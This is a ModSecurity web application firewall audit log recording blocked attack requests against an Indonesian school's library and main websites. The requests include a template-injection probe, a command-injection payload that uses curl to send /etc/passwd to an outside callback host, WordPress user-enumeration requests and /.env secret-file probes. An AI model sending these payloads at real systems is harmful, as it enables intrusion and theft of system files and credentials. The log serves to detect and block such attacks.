/login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 162995350 --fa1c3733-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fa1c3733-E-- --fa1c3733-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 154.26.179.43 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747975583179968 4020 (- - -) Stopwatch2: 1747975583179968 4020; combined=2165, p1=622, p2=1499, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa1c3733-Z-- --1c306556-A-- [23/May/2025:12:23:25 +0700] aDAGTW_WNRyhaqaKDLxbHwAAAMk 103.236.140.4 36916 103.236.140.4 8181 --1c306556-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 193 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159433393 --1c306556-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0mbkqa4kqtm561jt3n0yop9j7gakgbim.oast.fun) --1c306556-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c306556-E-- --1c306556-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747977805430011 2620 (- - -) Stopwatch2: 1747977805430011 2620; combined=1032, p1=662, p2=341, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c306556-Z-- --d7dbbf5d-A-- [23/May/2025:12:46:48 +0700] aDALyB67_KloOut96EkpHQAAAJI 103.236.140.4 57386 103.236.140.4 8181 --d7dbbf5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.195.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.195.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d7dbbf5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7dbbf5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747979208176536 3451 (- - -) Stopwatch2: 1747979208176536 3451; combined=1754, p1=513, p2=1199, p3=0, p4=0, p5=42, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7dbbf5d-Z-- --ca290e43-A-- [23/May/2025:13:04:17 +0700] aDAP4bz70bfNdlplZZMYFgAAAEk 103.236.140.4 38020 103.236.140.4 8181 --ca290e43-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ca290e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca290e43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747980257626816 811 (- - -) Stopwatch2: 1747980257626816 811; combined=305, p1=269, p2=0, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca290e43-Z-- --d1891b6f-A-- [23/May/2025:13:27:32 +0700] aDAVVG_WNRyhaqaKDLydxgAAANg 103.236.140.4 58072 103.236.140.4 8181 --d1891b6f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.2.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.2.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1891b6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1891b6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747981652140151 2498 (- - -) Stopwatch2: 1747981652140151 2498; combined=1257, p1=477, p2=748, p3=0, p4=0, p5=32, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1891b6f-Z-- --ab55ce66-A-- [23/May/2025:13:28:47 +0700] aDAVn7z70bfNdlplZZMyEgAAAFU 103.236.140.4 60702 103.236.140.4 8181 --ab55ce66-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.66.56.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.66.56.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab55ce66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab55ce66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747981727121959 2494 (- - -) Stopwatch2: 1747981727121959 2494; combined=1267, p1=406, p2=833, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab55ce66-Z-- --74cdb646-A-- [23/May/2025:13:30:11 +0700] aDAV87z70bfNdlplZZMzKwAAAEs 103.236.140.4 35410 103.236.140.4 8181 --74cdb646-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C202 Safari/604.1 Accept-Charset: utf-8 --74cdb646-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74cdb646-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747981811398730 905 (- - -) Stopwatch2: 1747981811398730 905; combined=379, p1=343, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74cdb646-Z-- --3be4f266-A-- [23/May/2025:14:04:36 +0700] aDAeBB67_KloOut96EmCcQAAAIc 103.236.140.4 51304 103.236.140.4 8181 --3be4f266-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.112.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.112.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3be4f266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3be4f266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747983876456033 3678 (- - -) Stopwatch2: 1747983876456033 3678; combined=1803, p1=516, p2=1252, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3be4f266-Z-- --7e472746-A-- [23/May/2025:14:54:17 +0700] aDApqW_WNRyhaqaKDLz-AQAAAMY 103.236.140.4 43860 103.236.140.4 8181 --7e472746-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.241.172.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.241.172.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7e472746-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e472746-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747986857605045 2977 (- - -) Stopwatch2: 1747986857605045 2977; combined=1573, p1=492, p2=1054, p3=0, p4=0, p5=27, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e472746-Z-- --a612b402-A-- [23/May/2025:14:54:50 +0700] aDApyh67_KloOut96Em--QAAAIY 103.236.140.4 45054 103.236.140.4 8181 --a612b402-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 191.6.90.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 191.6.90.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a612b402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a612b402-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747986890564110 3114 (- - -) Stopwatch2: 1747986890564110 3114; combined=1611, p1=490, p2=1094, p3=0, p4=0, p5=27, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a612b402-Z-- --ec55e044-A-- [23/May/2025:15:13:15 +0700] aDAuG2_WNRyhaqaKDLwQpAAAAMs 103.236.140.4 56594 103.236.140.4 8181 --ec55e044-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.110 Safari/537.36 Vivaldi/2.7.1628.28 Accept-Charset: utf-8 --ec55e044-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec55e044-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747987995597023 553 (- - -) Stopwatch2: 1747987995597023 553; combined=216, p1=188, p2=0, p3=0, p4=0, p5=27, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec55e044-Z-- --2490f218-A-- [23/May/2025:15:21:08 +0700] aDAv9B67_KloOut96EnaOQAAAI8 103.236.140.4 45154 103.236.140.4 8181 --2490f218-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.158.219.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.158.219.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2490f218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2490f218-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988468249398 2260 (- - -) Stopwatch2: 1747988468249398 2260; combined=1149, p1=375, p2=746, p3=0, p4=0, p5=27, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2490f218-Z-- --0c7eac20-A-- [23/May/2025:15:22:06 +0700] aDAwLh67_KloOut96EnbQgAAAJU 103.236.140.4 47220 103.236.140.4 8181 --0c7eac20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.44.121.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.44.121.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0c7eac20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7eac20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988526027888 2653 (- - -) Stopwatch2: 1747988526027888 2653; combined=1096, p1=364, p2=706, p3=0, p4=0, p5=25, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7eac20-Z-- --f25a4b34-A-- [23/May/2025:15:23:01 +0700] aDAwZVYzwfxII7zMfyGs3QAAAAY 103.236.140.4 49184 103.236.140.4 8181 --f25a4b34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.152.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.152.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f25a4b34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25a4b34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747988581826734 5229 (- - -) Stopwatch2: 1747988581826734 5229; combined=3068, p1=1568, p2=1464, p3=0, p4=0, p5=35, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25a4b34-Z-- --24c3655f-A-- [23/May/2025:15:31:05 +0700] aDAySVYzwfxII7zMfyG0hwAAAA4 103.236.140.4 38004 103.236.140.4 8181 --24c3655f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.223.229.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.223.229.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --24c3655f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24c3655f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747989065567611 3737 (- - -) Stopwatch2: 1747989065567611 3737; combined=1956, p1=577, p2=1344, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24c3655f-Z-- --c26fe628-A-- [23/May/2025:15:34:58 +0700] aDAzMh67_KloOut96EnqWwAAAIM 103.236.140.4 46172 103.236.140.4 8181 --c26fe628-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.183.20.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.183.20.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c26fe628-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c26fe628-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747989298697476 2444 (- - -) Stopwatch2: 1747989298697476 2444; combined=1130, p1=384, p2=716, p3=0, p4=0, p5=29, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c26fe628-Z-- --6b5cc32f-A-- [23/May/2025:16:04:59 +0700] aDA6O2_WNRyhaqaKDLxIvwAAANI 103.236.140.4 53858 103.236.140.4 8181 --6b5cc32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.83.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.83.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 Accept-Charset: utf-8 --6b5cc32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b5cc32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747991099644603 849 (- - -) Stopwatch2: 1747991099644603 849; combined=367, p1=324, p2=0, p3=0, p4=0, p5=42, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 